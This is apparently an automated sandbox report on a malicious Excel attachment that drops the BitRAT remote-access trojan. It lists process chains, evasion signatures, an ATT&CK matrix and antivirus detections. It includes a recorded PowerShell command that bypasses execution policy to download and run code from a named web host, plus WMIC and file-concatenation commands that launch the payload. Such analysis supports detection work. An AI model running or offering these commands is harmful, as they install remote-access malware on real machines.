      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02211133 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210C36 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210B3A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210A3C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210704 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210B06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210A08 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210D17 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221096C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210B6E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210A70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210C4B mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221115B mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022109A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210BA2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210EA2 mov ebx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210EA2 mov edx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210AA4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210698 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210CD5 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210AD5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022109D4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210BD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0069B53C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004AABEB GetProcessHeap,HeapFree,
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: Yara matchFile source: Scanned_25526662-Payment.xls, type: SAMPLE
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: Test3.jpg, 0000001D.00000003.488792166.00000000035B4000.00000004.00000001.sdmpBinary or memory string: Program Manager]
      Source: Test3.jpg, 0000001D.00000003.470470282.00000000035B4000.00000004.00000001.sdmpBinary or memory string: Program ManagerY
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0040EA7D cpuid
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: ___crtGetLocaleInfoEx,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004139F1 __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected BitRATShow sources
      Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected BitRATShow sources
      Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting11Boot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerSystem Information Discovery36SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading11DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion14Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 337288 Sample: Scanned_25526662-Payment.xls Startdate: 08/01/2021 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for dropped file 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->58 60 8 other signatures 2->60 9 EXCEL.EXE 29 37 2->9         started        13 Test3.jpg 2->13         started        process3 file4 44 C:\Users\...\Scanned_25526662-Payment.xls.LNK, MS 9->44 dropped 66 Document exploit detected (process start blacklist hit) 9->66 68 PowerShell case anomaly found 9->68 15 cmd.exe 1 9->15         started        70 Antivirus detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 74 Maps a DLL or memory area into another process 13->74 76 Contains functionality to hide a thread from the debugger 13->76 18 Test3.jpg 1 13->18         started        signatures5 process6 dnsIp7 78 PowerShell case anomaly found 15->78 21 powershell.exe 15 36 15->21         started        26 conhost.exe 15->26         started        50 45.15.143.216, 49734, 49740, 49742 DEDIPATH-LLCUS Latvia 18->50 80 Hides threads from debuggers 18->80 signatures8 process9 dnsIp10 52 lankarecipes.com 192.185.236.165, 49731, 80 UNIFIEDLAYER-AS-1US United States 21->52 40 C:\Users\user\AppData\Local\Temp\Test1.txt, PE32 21->40 dropped 42 C:\Users\user\AppData\...\nwaha3c5.cmdline, UTF-8 21->42 dropped 64 Powershell drops PE file 21->64 28 cmd.exe 1 21->28         started        30 cmd.exe 2 21->30         started        33 csc.exe 3 21->33         started        file11 signatures12 process13 file14 35 WMIC.exe 1 28->35         started        46 C:\Users\user\AppData\Local\Temp\Test3.jpg, PE32 30->46 dropped 48 C:\Users\user\AppData\Local\...\nwaha3c5.dll, PE32 33->48 dropped 38 cvtres.exe 1 33->38         started        process15 signatures16 62 Creates processes via WMI 35->62

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Scanned_25526662-Payment.xls15%VirustotalBrowse
      Scanned_25526662-Payment.xls15%ReversingLabsDocument-Word.Trojan.Heuristic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Test3.jpg100%AviraTR/Dropper.Gen
      C:\Users\user\AppData\Local\Temp\Test3.jpg100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Test1.txt100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Test1.txt36%ReversingLabsWin32.Trojan.Caynamer

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      27.2.Test3.jpg.30e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      29.1.Test3.jpg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      29.2.Test3.jpg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      lankarecipes.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      http://lankarecipes.com/Sparc.jp0%Avira URL Cloudsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
      https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
